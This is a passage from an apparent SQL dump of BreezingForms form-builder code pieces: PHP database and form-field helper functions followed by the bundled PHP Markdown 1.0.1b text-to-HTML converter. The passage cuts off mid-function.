\r\n mt_srand((double)microtime()*1000000);\r\n $ff_seccode = mt_rand(10000, 99999);\r\n JFactory::getSession()->set(\'ff_seccode\', $ff_seccode);\r\n } // if\r\n\r\n return \'<img src=\"\'.JURI::root().\'ff_secimage.php?option=com_breezingforms&showSecImage=true\" title=\"\" alt=\"\" />\';\r\n} // ff_securityImage'),(23,1,'FF','ff_select','Select rows from db','Execute a select query\r\n\r\nInclude by one of:\r\n\r\n $this->execPieceByName(\'ff_InitUtilities\');\r\n $this->execPieceByName(\'ff_SubmitUtilities\');\r\n if (!function_exists(\'ff_select\')) $this->execPieceByName(\'ff_select\');\r\n\r\nCall syntax:\r\n\r\n $rows = ff_select($sql);\r\n\r\n $sql: Sql SELECT-statement to call\r\n $rows: List of row objects','Untyped','function ff_select($sql, $error=FF_DIE)\r\n{\r\n $database = JFactory::getDBO();\r\n $database->setQuery($sql);\r\n $rows = $database->loadObjectList();\r\n if ($database->getErrorNum()) {\r\n $dienow = $error==FF_DIE;\r\n $error = $database->stderr();\r\n $rows = array();\r\n if ($dienow) ff_die($error);\r\n } else\r\n $error = null;\r\n return $rows;\r\n} // ff_select'),(24,1,'FF','ff_selectValue','Select single value from db','Execute query to read a single value\r\n\r\nInclude by one of:\r\n\r\n $this->execPieceByName(\'ff_InitUtilities\');\r\n $this->execPieceByName(\'ff_SubmitUtilities\');\r\n if (!function_exists(\'ff_selectValue\')) $this->execPieceByName(\'ff_selectValue\');\r\n\r\nCall syntax:\r\n\r\n $value = ff_selectValue($sql);\r\n\r\n $sql: Sql SELECT-statement to call\r\n $value: The value returned by the database','Untyped','function ff_selectValue($sql, $def=null, $error=FF_DIE)\r\n{\r\n $database = JFactory::getDBO();\r\n $database->setQuery($sql);\r\n $value = $database->loadResult();\r\n if ($database->getErrorNum()) {\r\n $dienow = $error==FF_DIE;\r\n $error = $database->stderr();\r\n if ($dienow) ff_die($error);\r\n } else {\r\n $error = null;\r\n if ($value) return $value;\r\n } // if\r\n return $def;\r\n} // ff_selectValue'),(25,1,'FF','ff_setCheckedX','Set checkbox/radiobutton checked','Set a radio button or checkbox checked. \r\n\r\nCall: \r\n\r\n ff_setChecked(\'name\', \'value\');','Untyped','function ff_setChecked($name, $value)\r\n{\r\n global $ff_processor;\r\n for ($r = 0; $r < $ff_processor->rowcount; $r++) {\r\n $row =& $ff_processor->rows[$r];\r\n if ($row->name==$name && $row->data1==$value)\r\n $row->flag1 = 1;\r\n unset($row);\r\n } // for\r\n} // ff_setChecked'),(26,1,'FF','ff_setSelectedX','Set a select list option to *selected*','Sets a select list option to selected. \r\n\r\nCall: \r\n\r\n ff_setSelected(\'name\', \'value\');','Untyped','function ff_setSelected($name, $value)\r\n{\r\n global $ff_processor;\r\n for ($r = 0; $r < $ff_processor->rowcount; $r++) {\r\n $row =& $ff_processor->rows[$r];\r\n if ($row->name==$name)\r\n $row->data2 =\r\n preg_replace(\r\n \'/(^|\\r\\n|\\n)(0|1);([^;]*);(\'.$value.\')($|\\r\\n|\\n)/\',\r\n \'${1}1;${3};${4}${5}\',\r\n $row->data2\r\n );\r\n unset($row);\r\n } // for\r\n} // ff_setSelected'),(27,1,'FF','ff_setValueX','Set text, textarea, hidden value','Set value of a Static Text, Text, Textarea or Hidden Input. \r\n\r\nCall: \r\n\r\n ff_setValue(\'name\', \'value\');','Untyped','function ff_setValue($name, $value)\r\n{\r\n global $ff_processor;\r\n for ($r = 0; $r < $ff_processor->rowcount; $r++) {\r\n $row =& $ff_processor->rows[$r];\r\n if ($row->name==$name)\r\n $row->data1 = $value;\r\n unset($row);\r\n } // for\r\n} // ff_setValue'),(28,1,'FF','Markdown','Original Markdown Processor','Converts text marked up by \'Markdown\' into HTML.\r\n\r\nPlease use ff_markdown() in forms instead of Markdown()','Untyped','#\r\n# Markdown - A text-to-HTML conversion tool for web writers\r\n#\r\n# Copyright (c) 2004-2005 John Gruber\r\n# <http://daringfireball.net/projects/markdown/>\r\n#\r\n# Copyright (c) 2004-2005 Michel Fortin - PHP Port\r\n# <http://www.michelf.com/projects/php-markdown/>\r\n#\r\n\r\nglobal $MarkdownPHPVersion, $MarkdownSyntaxVersion,\r\n $md_empty_element_suffix, $md_tab_width,\r\n $md_nested_brackets_depth, $md_nested_brackets,\r\n $md_escape_table, $md_backslash_escape_table,\r\n $md_list_level;\r\n\r\n$MarkdownPHPVersion = \'1.0.1b\'; # Mon 6 Jun 2005\r\n$MarkdownSyntaxVersion = \'1.0.1\'; # Sun 12 Dec 2004\r\n\r\n\r\n#\r\n# Global default settings:\r\n#\r\n$md_empty_element_suffix = \" />\"; # Change to \">\" for HTML output\r\n$md_tab_width = 4;\r\n\r\n#\r\n# WordPress settings:\r\n#\r\n$md_wp_posts = true; # Set to false to remove Markdown from posts.\r\n$md_wp_comments = true; # Set to false to remove Markdown from comments.\r\n\r\n\r\n# -- WordPress Plugin Interface -----------------------------------------------\r\n/*\r\nPlugin Name: Markdown\r\nPlugin URI: http://www.michelf.com/projects/php-markdown/\r\nDescription: <a href=\"http://daringfireball.net/projects/markdown/syntax\">Markdown syntax</a> allows you to write using an easy-to-read, easy-to-write plain text format. Based on the original Perl version by <a href=\"http://daringfireball.net/\">John Gruber</a>. <a href=\"http://www.michelf.com/projects/php-markdown/\">More...</a>\r\nVersion: 1.0.1b\r\nAuthor: Michel Fortin\r\nAuthor URI: http://www.michelf.com/\r\n*/\r\nif (isset($wp_version)) {\r\n # More details about how it works here:\r\n # <http://www.michelf.com/weblog/2005/wordpress-text-flow-vs-markdown/>\r\n\r\n # Post content and excerpts\r\n if ($md_wp_posts) {\r\n remove_filter(\'the_content\', \'wpautop\');\r\n remove_filter(\'the_excerpt\', \'wpautop\');\r\n add_filter(\'the_content\', \'Markdown\', 6);\r\n add_filter(\'get_the_excerpt\', \'Markdown\', 6);\r\n add_filter(\'get_the_excerpt\', \'trim\', 7);\r\n add_filter(\'the_excerpt\', \'md_add_p\');\r\n add_filter(\'the_excerpt_rss\', \'md_strip_p\');\r\n\r\n remove_filter(\'content_save_pre\', \'balanceTags\', 50);\r\n remove_filter(\'excerpt_save_pre\', \'balanceTags\', 50);\r\n add_filter(\'the_content\', \'balanceTags\', 50);\r\n add_filter(\'get_the_excerpt\', \'balanceTags\', 9);\r\n\r\n function md_add_p($text) {\r\n if (strlen($text) == 0) return;\r\n if (strcasecmp(substr($text, -3), \'<p>\') == 0) return $text;\r\n return \'<p>\'.$text.\'</p>\';\r\n }\r\n function md_strip_p($t) { return preg_replace(\'{</?[pP]>}\', \'\', $t); }\r\n }\r\n\r\n # Comments\r\n if ($md_wp_comments) {\r\n remove_filter(\'comment_text\', \'wpautop\');\r\n remove_filter(\'comment_text\', \'make_clickable\');\r\n add_filter(\'pre_comment_content\', \'Markdown\', 6);\r\n add_filter(\'pre_comment_content\', \'md_hide_tags\', 8);\r\n add_filter(\'pre_comment_content\', \'md_show_tags\', 12);\r\n add_filter(\'get_comment_text\', \'Markdown\', 6);\r\n add_filter(\'get_comment_excerpt\', \'Markdown\', 6);\r\n add_filter(\'get_comment_excerpt\', \'md_strip_p\', 7);\r\n\r\n global $md_hidden_tags;\r\n $md_hidden_tags = array(\r\n \'<p>\' => md5(\'<p>\'), \'</p>\' => md5(\'</p>\'),\r\n \'<pre>\' => md5(\'<pre>\'), \'</pre>\'=> md5(\'</pre>\'),\r\n \'<ol>\' => md5(\'<ol>\'), \'</ol>\' => md5(\'</ol>\'),\r\n \'<ul>\' => md5(\'<ul>\'), \'</ul>\' => md5(\'</ul>\'),\r\n \'<li>\' => md5(\'<li>\'), \'</li>\' => md5(\'</li>\'),\r\n );\r\n\r\n function md_hide_tags($text) {\r\n global $md_hidden_tags;\r\n return str_replace(array_keys($md_hidden_tags),\r\n array_values($md_hidden_tags), $text);\r\n }\r\n function md_show_tags($text) {\r\n global $md_hidden_tags;\r\n return str_replace(array_values($md_hidden_tags),\r\n array_keys($md_hidden_tags), $text);\r\n }\r\n }\r\n}\r\n\r\n\r\n# -- bBlog Plugin Info --------------------------------------------------------\r\nfunction identify_modifier_markdown() {\r\n global $MarkdownPHPVersion;\r\n return array(\r\n \'name\' => \'markdown\',\r\n \'type\' => \'modifier\',\r\n \'nicename\' => \'Markdown\',\r\n \'description\' => \'A text-to-HTML conversion tool for web writers\',\r\n \'authors\' => \'Michel Fortin and John Gruber\',\r\n \'licence\' => \'GPL\',\r\n \'version\' => $MarkdownPHPVersion,\r\n \'help\' => \'<a href=\"http://daringfireball.net/projects/markdown/syntax\">Markdown syntax</a> allows you to write using an easy-to-read, easy-to-write plain text format. Based on the original Perl version by <a href=\"http://daringfireball.net/\">John Gruber</a>. <a href=\"http://www.michelf.com/projects/php-markdown/\">More...</a>\'\r\n );\r\n}\r\n\r\n# -- Smarty Modifier Interface ------------------------------------------------\r\nfunction smarty_modifier_markdown($text) {\r\n return Markdown($text);\r\n}\r\n\r\n# -- Textile Compatibility Mode -----------------------------------------------\r\n# Rename this file to \"classTextile.php\" and it can replace Textile anywhere.\r\nif (strcasecmp(substr(__FILE__, -16), \"classTextile.php\") == 0) {\r\n # Try to include PHP SmartyPants. Should be in the same directory.\r\n @include_once \'smartypants.php\';\r\n # Fake Textile class. It calls Markdown instead.\r\n class Textile {\r\n function TextileThis($text, $lite=\'\', $encode=\'\', $noimage=\'\', $strict=\'\') {\r\n if ($lite == \'\' && $encode == \'\') $text = Markdown($text);\r\n if (function_exists(\'SmartyPants\')) $text = SmartyPants($text);\r\n return $text;\r\n }\r\n }\r\n}\r\n\r\n\r\n\r\n#\r\n# Globals:\r\n#\r\n\r\n# Regex to match balanced [brackets].\r\n# Needed to insert a maximum bracked depth while converting to PHP.\r\n$md_nested_brackets_depth = 6;\r\n$md_nested_brackets =\r\n str_repeat(\'(?>[^\\[\\]]+|\\[\', $md_nested_brackets_depth).\r\n str_repeat(\'\\])*\', $md_nested_brackets_depth);\r\n\r\n# Table of hash values for escaped characters:\r\n$md_escape_table = array(\r\n \"\\\\\" => md5(\"\\\\\"),\r\n \"`\" => md5(\"`\"),\r\n \"*\" => md5(\"*\"),\r\n \"_\" => md5(\"_\"),\r\n \"{\" => md5(\"{\"),\r\n \"}\" => md5(\"}\"),\r\n \"[\" => md5(\"[\"),\r\n \"]\" => md5(\"]\"),\r\n \"(\" => md5(\"(\"),\r\n \")\" => md5(\")\"),\r\n \">\" => md5(\">\"),\r\n \"#\" => md5(\"#\"),\r\n \"+\" => md5(\"+\"),\r\n \"-\" => md5(\"-\"),\r\n \".\" => md5(\".\"),\r\n \"!\" => md5(\"!\")\r\n);\r\n# Create an identical table but for escaped characters.\r\n$md_backslash_escape_table;\r\nforeach ($md_escape_table as $key => $char)\r\n $md_backslash_escape_table[\"\\\\$key\"] = $char;\r\n\r\n\r\nfunction Markdown($text) {\r\n#\r\n# Main function. The order in which other subs are called here is\r\n# essential. Link and image substitutions need to happen before\r\n# _EscapeSpecialCharsWithinTagAttributes(), so that any *\'s or _\'s in the <a>\r\n# and <img> tags get encoded.\r\n#\r\n # Clear the global hashes. If we don\'t clear these, you get conflicts\r\n # from other articles when generating a page which contains more than\r\n # one article (e.g. an index page that shows the N most recent\r\n # articles):\r\n global $md_urls, $md_titles, $md_html_blocks;\r\n $md_urls = array();\r\n $md_titles = array();\r\n $md_html_blocks = array();\r\n\r\n # Standardize line endings:\r\n # DOS to Unix and Mac to Unix\r\n $text = str_replace(array(\"\\r\\n\", \"\\r\"), \"\\n\", $text);\r\n\r\n # Make sure $text ends with a couple of newlines:\r\n $text .= \"\\n\\n\";\r\n\r\n # Convert all tabs to spaces.\r\n $text = _Detab($text);\r\n\r\n # Strip any lines consisting only of spaces and tabs.\r\n # This makes subsequent regexen easier to write, because we can\r\n # match consecutive blank lines with /\\n+/ instead of something\r\n # contorted like /[ \\t]*\\n+/ .\r\n $text = preg_replace(\'/^[ \\t]+$/m\', \'\', $text);\r\n\r\n # Turn block-level HTML blocks into hash entries\r\n $text = _HashHTMLBlocks($text);\r\n\r\n # Strip link definitions, store in hashes.\r\n $text = _StripLinkDefinitions($text);\r\n\r\n $text = _RunBlockGamut($text);\r\n\r\n $text = _UnescapeSpecialChars($text);\r\n\r\n return $text . \"\\n\";\r\n}\r\n\r\n\r\nfunction _StripLinkDefinitions($text) {\r\n#\r\n# Strips link definitions from text, stores the URLs and titles in\r\n# hash references.\r\n#\r\n global $md_tab_width;\r\n $less_than_tab = $md_tab_width - 1;\r\n\r\n # Link defs are in the form: ^[id]: url \"optional title\"\r\n $text = preg_replace_callback(\'{\r\n ^[ ]{0,\'.$less_than_tab.\'}\\[(.+)\\]: # id = $1\r\n [ \\t]*\r\n \\n? # maybe *one* newline\r\n [ \\t]*\r\n <?(\\S+?)>? # url = $2\r\n [ \\t]*\r\n \\n? # maybe one newline\r\n [ \\t]*\r\n (?:\r\n (?<=\\s) # lookbehind for whitespace\r\n [\"(]\r\n (.+?) # title = $3\r\n [\")]\r\n [ \\t]*\r\n )? # title is optional\r\n (?:\\n+|\\Z)\r\n }xm\',\r\n \'_StripLinkDefinitions_callback\',\r\n $text);\r\n return $text;\r\n}\r\nfunction _StripLinkDefinitions_callback($matches) {\r\n global $md_urls, $md_titles;\r\n $link_id = strtolower($matches[1]);\r\n $md_urls[$link_id] = _EncodeAmpsAndAngles($matches[2]);\r\n if (isset($matches[3]))\r\n $md_titles[$link_id] = str_replace(\'\"\', \'"\', $matches[3]);\r\n return \'\'; # String that will replace the block\r\n}\r\n\r\n\r\nfunction _HashHTMLBlocks($text) {\r\n global $md_tab_width;\r\n $less_than_tab = $md_tab_width - 1;\r\n\r\n # Hashify HTML blocks:\r\n # We only want to do this for block-level HTML tags, such as headers,\r\n # lists, and tables. That\'s because we still want to wrap <p>s around\r\n # \"paragraphs\" that are wrapped in non-block-level tags, such as anchors,\r\n # phrase emphasis, and spans. The list of tags we\'re looking for is\r\n # hard-coded:\r\n $block_tags_a = \'p|div|h[1-6]|blockquote|pre|table|dl|ol|ul|\'.\r\n \'script|noscript|form|fieldset|iframe|math|ins|del\';\r\n $block_tags_b = \'p|div|h[1-6]|blockquote|pre|table|dl|ol|ul|\'.\r\n \'script|noscript|form|fieldset|iframe|math\';\r\n\r\n # First, look for nested blocks, e.g.:\r\n # <div>\r\n # <div>\r\n # tags for inner block must be indented.\r\n # </div>\r\n # </div>\r\n #\r\n # The outermost tags must start at the left margin for this to match, and\r\n # the inner nested divs must be indented.\r\n # We need to do this before the next, more liberal match, because the next\r\n # match will start at the first `<div>` and stop at the first `</div>`.\r\n $text = preg_replace_callback(\"{\r\n ( # save in $1\r\n ^ # start of line (with /m)\r\n <($block_tags_a) # start tag = $2\r\n \\\\b # word break\r\n (.*\\\\n)*? # any number of lines, minimally matching\r\n </\\\\2> # the matching end tag\r\n [ \\\\t]* # trailing spaces/tabs\r\n (?=\\\\n+|\\\\Z) # followed by a newline or end of document\r\n )\r\n }xm\",\r\n \'_HashHTMLBlocks_callback\',\r\n $text);\r\n\r\n #\r\n # Now match more liberally, simply from `\\n<tag>` to `</tag>\\n`\r\n #\r\n $text = preg_replace_callback(\"{\r\n ( # save in $1\r\n ^ # start of line (with /m)\r\n <($block_tags_b) # start tag = $2\r\n \\\\b # word break\r\n (.*\\\\n)*? # any number of lines, minimally matching\r\n .*</\\\\2> # the matching end tag\r\n [ \\\\t]* # trailing spaces/tabs\r\n (?=\\\\n+|\\\\Z) # followed by a newline or end of document\r\n )\r\n }xm\",\r\n \'_HashHTMLBlocks_callback\',\r\n $text);\r\n\r\n # Special case just for <hr />. It was easier to make a special case than\r\n # to make the other regex more complicated.\r\n $text = preg_replace_callback(\'{\r\n (?:\r\n (?<=\\n\\n) # Starting after a blank line\r\n | # or\r\n \\A\\n? # the beginning of the doc\r\n )\r\n ( # save in $1\r\n [ ]{0,\'.$less_than_tab.\'}\r\n <(hr) # start tag = $2\r\n \\b # word break\r\n ([^<>])*? #\r\n /?> # the matching end tag\r\n [ \\t]*\r\n (?=\\n{2,}|\\Z) # followed by a blank line or end of document\r\n )\r\n }x\',\r\n \'_HashHTMLBlocks_callback\',\r\n $text);\r\n\r\n # Special case for standalone HTML comments:\r\n $text = preg_replace_callback(\'{\r\n (?:\r\n (?<=\\n\\n) # Starting after a blank line\r\n | # or\r\n \\A\\n? # the beginning of the doc\r\n )\r\n ( # save in $1\r\n [ ]{0,\'.$less_than_tab.\'}\r\n (?s:\r\n <!\r\n (--.*?--\\s*)+\r\n >\r\n )\r\n [ \\t]*\r\n (?=\\n{2,}|\\Z) # followed by a blank line or end of document\r\n )\r\n }x\',\r\n \'_HashHTMLBlocks_callback\',\r\n $text);\r\n\r\n return $text;\r\n}\r\nfunction _HashHTMLBlocks_callback($matches) {\r\n global $md_html_blocks;\r\n $text = $matches[1];\r\n $key = md5($text);\r\n $md_html_blocks[$key] = $text;\r\n return \"\\n\\n$key\\n\\n\"; # String that will replace the block\r\n}\r\n\r\n\r\nfunction _RunBlockGamut($text) {\r\n#\r\n# These are all the transformations that form block-level\r\n# tags like paragraphs, headers, and list items.\r\n#\r\n global $md_empty_element_suffix;\r\n\r\n $text = _DoHeaders($text);\r\n\r\n # Do Horizontal Rules:\r\n $text = preg_replace(\r\n array(\'{^[ ]{0,2}([ ]?\\*[ ]?){3,}[ \\t]*$}mx\',\r\n \'{^[ ]{0,2}([ ]? -[ ]?){3,}[ \\t]*$}mx\',\r\n \'{^[ ]{0,2}([ ]? _[ ]?){3,}[ \\t]*$}mx\'),\r\n \"\\n<hr$md_empty_element_suffix\\n\",\r\n $text);\r\n\r\n $text = _DoLists($text);\r\n $text = _DoCodeBlocks($text);\r\n $text = _DoBlockQuotes($text);\r\n\r\n # We already ran _HashHTMLBlocks() before, in Markdown(), but that\r\n # was to escape raw HTML in the original Markdown source. This time,\r\n # we\'re escaping the markup we\'ve just created, so that we don\'t wrap\r\n # <p> tags around block-level tags.\r\n $text = _HashHTMLBlocks($text);\r\n $text = _FormParagraphs($text);\r\n\r\n return $text;\r\n}\r\n\r\n\r\nfunction _RunSpanGamut($text) {\r\n#\r\n# These are all the transformations that occur *within* block-level\r\n# tags like paragraphs, headers, and list items.\r\n#\r\n global $md_empty_element_suffix;\r\n\r\n $text = _DoCodeSpans($text);\r\n\r\n $text = _EscapeSpecialChars($text);\r\n\r\n # Process anchor and image tags. Images must come first,\r\n # because ![foo][f] looks like an anchor.\r\n $text = _DoImages($text);\r\n $text = _DoAnchors($text);\r\n\r\n # Make links out of things like `<http://example.com/>`\r\n # Must come after _DoAnchors(), because you can use < and >\r\n # delimiters in inline links like [this](<url>).\r\n $text = _DoAutoLinks($text);\r\n $text = _EncodeAmpsAndAngles($text);\r\n $text = _DoItalicsAndBold($text);\r\n\r\n # Do hard breaks:\r\n $text = preg_replace(\'/ {2,}\\n/\', \"<br$md_empty_element_suffix\\n\", $text);\r\n\r\n return $text;\r\n}\r\n\r\n\r\nfunction _EscapeSpecialChars($text) {\r\n global $md_escape_table;\r\n $tokens = _TokenizeHTML($text);\r\n\r\n $text = \'\'; # rebuild $text from the tokens\r\n# $in_pre = 0; # Keep track of when we\'re inside <pre> or <code> tags.\r\n# $tags_to_skip = \"!<(/?)(?:pre|code|kbd|script|math)[\\s>]!\";\r\n\r\n foreach ($tokens as $cur_token) {\r\n if ($cur_token[0] == \'tag\') {\r\n # Within tags, encode * and _ so they don\'t conflict\r\n # with their use in Markdown for italics and strong.\r\n # We\'re replacing each such character with its\r\n # corresponding MD5 checksum value; this is likely\r\n # overkill, but it should prevent us from colliding\r\n # with the escape values by accident.\r\n $cur_token[1] = str_replace(array(\'*\', \'_\'),\r\n array($md_escape_table[\'*\'], $md_escape_table[\'_\']),\r\n $cur_token[1]);\r\n $text .= $cur_token[1];\r\n } else {\r\n $t = $cur_token[1];\r\n $t = _EncodeBackslashEscapes($t);\r\n $text .= $t;\r\n }\r\n }\r\n return $text;\r\n}\r\n\r\n\r\nfunction _DoAnchors($text) {\r\n#\r\n# Turn Markdown link shortcuts into XHTML <a> tags.\r\n#\r\n global $md_nested_brackets;\r\n #\r\n # First, handle reference-style links: [link text] [id]\r\n #\r\n $text = preg_replace_callback(\"{\r\n ( # wrap whole match in $1\r\n \\\\[\r\n ($md_nested_brackets) # link text = $2\r\n \\\\]\r\n\r\n [ ]? # one optional space\r\n (?:\\\\n[ ]*)? # one optional newline followed by spaces\r\n\r\n \\\\[\r\n (.*?) # id = $3\r\n \\\\]\r\n )\r\n }xs\",\r\n \'_DoAnchors_reference_callback\', $text);\r\n\r\n #\r\n # Next, inline-style links: [link text](url \"optional title\")\r\n #\r\n $text = preg_replace_callback(\"{\r\n ( # wrap whole match in $1\r\n \\\\[\r\n ($md_nested_brackets) # link text = $2\r\n \\\\]\r\n \\\\( # literal paren\r\n [ \\\\t]*\r\n <?(.*?)>? # href = $3\r\n [ \\\\t]*\r\n ( # $4\r\n ([\'\\\"]) # quote char = $5\r\n (.*?) # Title = $6\r\n \\\\5 # matching quote\r\n )? # title is optional\r\n \\\\)\r\n )\r\n }xs\",\r\n \'_DoAnchors_inline_callback\', $text);\r\n\r\n return $text;\r\n}\r\nfunction _DoAnchors_reference_callback($matches) {\r\n global $md_urls, $md_titles, $md_escape_table;\r\n $whole_match = $matches[1];\r\n $link_text = $matches[2];\r\n $link_id = strtolower($matches[3]);\r\n\r\n if ($link_id == \"\") {\r\n $link_id = strtolower($link_text); # for shortcut links like [this][].\r\n }\r\n\r\n if (isset($md_urls[$link_id])) {\r\n $url = $md_urls[$link_id];\r\n # We\'ve got to encode these to avoid conflicting with italics/bold.\r\n $url = str_replace(array(\'*\', \'_\'),\r\n array($md_escape_table[\'*\'], $md_escape_table[\'_\']),\r\n $url);\r\n $result = \"<a href=\\\"$url\\\"\";\r\n if ( isset( $md_titles[$link_id] ) ) {\r\n $title = $md_titles[$link_id];\r\n $title = str_replace(array(\'*\', \'_\'),\r\n array($md_escape_table[\'*\'],\r\n $md_escape_table[\'_\']), $title);\r\n $result .= \" title=\\\"$title\\\"\";\r\n }\r\n $result .= \">$link_text</a>\";\r\n }\r\n else {\r\n $result = $whole_match;\r\n }\r\n return $result;\r\n}\r\nfunction _DoAnchors_inline_callback($matches) {\r\n global $md_escape_table;\r\n $whole_match = $matches[1];\r\n $link_text = $matches[2];\r\n $url = $matches[3];\r\n $title =& $matches[6];\r\n\r\n # We\'ve got to encode these to avoid conflicting with italics/bold.\r\n $url = str_replace(array(\'*\', \'_\'),\r\n array($md_escape_table[\'*\'], $md_escape_table[\'_\']),\r\n $url);\r\n $result = \"<a href=\\\"$url\\\"\";\r\n if (isset($title)) {\r\n $title = str_replace(\'\"\', \'"\', $title);\r\n $title = str_replace(array(\'*\', \'_\'),\r\n array($md_escape_table[\'*\'], $md_escape_table[\'_\']),\r\n $title);\r\n $result .= \" title=\\\"$title\\\"\";\r\n }\r\n\r\n $result .= \">$link_text</a>\";\r\n\r\n return $result;\r\n}\r\n\r\n\r\nfunction _DoImages($text) {\r\n#\r\n# Turn Markdown image shortcuts into <img> tags.\r\n#\r\n global $md_nested_brackets;\r\n\r\n #\r\n # First, handle reference-style labeled images: ![alt text][id]\r\n #\r\n $text = preg_replace_callback(\'{\r\n ( # wrap whole match in $1\r\n !\\[\r\n (\'.$md_nested_brackets.\') # alt text = $2\r\n \\]\r\n\r\n [ ]? # one optional space\r\n (?:\\n[ ]*)? # one optional newline followed by spaces\r\n\r\n \\[\r\n (.*?) # id = $3\r\n \\]\r\n\r\n )\r\n }xs\',\r\n \'_DoImages_reference_callback\', $text);\r\n\r\n #\r\n # Next, handle inline images: \r\n # Don\'t forget: encode * and _\r\n\r\n $text = preg_replace_callback(\'{\r\n ( # wrap whole match in $1\r\n !\\[\r\n (\'.$md_nested_brackets.\') # alt text = $2\r\n \\]\r\n \\( # literal paren\r\n [ \\t]*\r\n <?(\\S+?)>? # src url = $3\r\n [ \\t]*\r\n ( # $4\r\n ([\\\'\"]) # quote char = $5\r\n (.*?) # title = $6\r\n \\5 # matching quote\r\n [ \\t]*\r\n )? # title is optional\r\n \\)\r\n )\r\n }xs\',\r\n \'_DoImages_inline_callback\', $text);\r\n\r\n return $text;\r\n}\r\nfunction _DoImages_reference_callback($matches) {\r\n global $md_urls, $md_titles, $md_empty_element_suffix, $md_escape_table;\r\n $whole_match = $matches[1];\r\n $alt_text = $matches[2];\r\n $link_id = strtolower($matches[3]);\r\n\r\n if ($link_id == \"\") {\r\n $link_id = strtolower($alt_text); # for shortcut links like ![this][].\r\n }\r\n\r\n $alt_text = str_replace(\'\"\', \'"\', $alt_text);\r\n if (isset($md_urls[$link_id])) {\r\n $url = $md_urls[$link_id];\r\n # We\'ve got to encode these to avoid conflicting with italics/bold.\r\n $url = str_replace(array(\'*\', \'_\'),\r\n array($md_escape_table[\'*\'], $md_escape_table[\'_\']),\r\n $url);\r\n $result = \"<img src=\\\"$url\\\" alt=\\\"$alt_text\\\"\";\r\n if (isset($md_titles[$link_id])) {\r\n $title = $md_titles[$link_id];\r\n $title = str_replace(array(\'*\', \'_\'),\r\n array($md_escape_table[\'*\'],\r\n $md_escape_table[\'_\']), $title);\r\n $result .= \" title=\\\"$title\\\"\";\r\n }\r\n $result .= $md_empty_element_suffix;\r\n }\r\n else {\r\n # If there\'s no such link ID, leave intact:\r\n $result = $whole_match;\r\n }\r\n\r\n return $result;\r\n}\r\nfunction _DoImages_inline_callback($matches) {\r\n global $md_empty_element_suffix, $md_escape_table;\r\n $whole_match = $matches[1];\r\n $alt_text = $matches[2];\r\n $url = $matches[3];\r\n $title = \'\';\r\n if (isset($matches[6])) {\r\n $title = $matches[6];\r\n }\r\n\r\n $alt_text = str_replace(\'\"\', \'"\', $alt_text);\r\n $title = str_replace(\'\"\', \'"\', $title);\r\n # We\'ve got to encode these to avoid conflicting with italics/bold.\r\n $url = str_replace(array(\'*\', \'_\'),\r\n array($md_escape_table[\'*\'], $md_escape_table[\'_\']),\r\n $url);\r\n $result = \"<img src=\\\"$url\\\" alt=\\\"$alt_text\\\"\";\r\n if (isset($title)) {\r\n $title = str_replace(array(\'*\', \'_\'),\r\n array($md_escape_table[\'*\'], $md_escape_table[\'_\']),\r\n $title);\r\n $result .= \" title=\\\"$title\\\"\"; # $title already quoted\r\n }\r\n $result .= $md_empty_element_suffix;\r\n\r\n return $result;\r\n}\r\n\r\n\r\nfunction _DoHeaders($text) {\r\n # Setext-style headers:\r\n # Header 1\r\n # ========\r\n #\r\n # Header 2\r\n # --------\r\n #\r\n $text = preg_replace(\r\n array(\'{ ^(.+)[ \\t]*\\n=+[ \\t]*\\n+ }emx\',\r\n \'{ ^(.+)[ \\t]*\\n-+[ \\t]*\\n+ }emx\'),\r\n array(\"\'<h1>\'._RunSpanGamut(_UnslashQuotes(\'\\\\1\')).\'</h1>\\n\\n\'\",\r\n \"\'<h2>\'._RunSpanGamut(_UnslashQuotes(\'\\\\1\')).\'</h2>\\n\\n\'\"),\r\n $text);\r\n\r\n # atx-style headers:\r\n # # Header 1\r\n # ## Header 2\r\n # ## Header 2 with closing hashes ##\r\n # ...\r\n # ###### Header 6\r\n #\r\n $text = preg_replace(\"{\r\n ^(\\\\#{1,6}) # $1 = string of #\'s\r\n [ \\\\t]*\r\n (.+?) # $2 = Header text\r\n [ \\\\t]*\r\n \\\\#* # optional closing #\'s (not counted)\r\n \\\\n+\r\n }xme\",\r\n \"\'<h\'.strlen(\'\\\\1\').\'>\'._RunSpanGamut(_UnslashQuotes(\'\\\\2\')).\'</h\'.strlen(\'\\\\1\').\'>\\n\\n\'\",\r\n $text);\r\n\r\n return $text;\r\n}\r\n\r\n\r\nfunction _DoLists($text) {\r\n#\r\n# Form HTML ordered (numbered) and unordered (bulleted) lists.\r\n#\r\n global $md_tab_width, $md_list_level;\r\n $less_than_tab = $md_tab_width - 1;\r\n\r\n # Re-usable patterns to match list item bullets and number markers:\r\n $marker_ul = \'[*+-]\';\r\n $marker_ol = \'\\d+[.]\';\r\n $marker_any = \"(?:$marker_ul|$marker_ol)\";\r\n\r\n $markers = array($marker_ul, $marker_ol);\r\n\r\n foreach ($markers as $marker) {\r\n # Re-usable pattern to match any entirel ul or ol list:\r\n $whole_list = \'\r\n ( # $1 = whole list\r\n ( # $2\r\n [ ]{0,\'.$less_than_tab.\'}\r\n (\'.$marker.\') # $3 = first list item marker\r\n [ \\t]+\r\n )\r\n (?s:.+?)\r\n ( # $4\r\n \\z\r\n |\r\n \\n{2,}\r\n (?=\\S)\r\n (?! # Negative lookahead for another list item marker\r\n [ \\t]*\r\n \'.$marker.\'[ \\t]+\r\n )\r\n )\r\n )\r\n \'; // mx\r\n\r\n # We use a different prefix before nested lists than top-level lists.\r\n # See extended comment in _ProcessListItems().\r\n\r\n if ($md_list_level) {\r\n $text = preg_replace_callback(\'{\r\n ^\r\n \'.$whole_list.\'\r\n }mx\',\r\n \'_DoLists_callback_top\', $text);\r\n }\r\n else {\r\n $text = preg_replace_callback(\'{\r\n (?:(?<=\\n\\n)|\\A\\n?)\r\n \'.$whole_list.\'\r\n }mx\',\r\n \'_DoLists_callback_nested\', $text);\r\n }\r\n }\r\n\r\n return $text;\r\n}\r\nfunction _DoLists_callback_top($matches) {\r\n # Re-usable patterns to match list item bullets and number markers:\r\n $marker_ul = \'[*+-]\';\r\n $marker_ol = \'\\d+[.]\';\r\n $marker_any = \"(?:$marker_ul|$marker_ol)\";\r\n\r\n $list = $matches[1];\r\n $list_type = preg_match(\"/$marker_ul/\", $matches[3]) ? \"ul\" : \"ol\";\r\n\r\n $marker_any = ( $list_type == \"ul\" ? $marker_ul : $marker_ol );\r\n\r\n # Turn double returns into triple returns, so that we can make a\r\n # paragraph for the last item in a list, if necessary:\r\n $list = 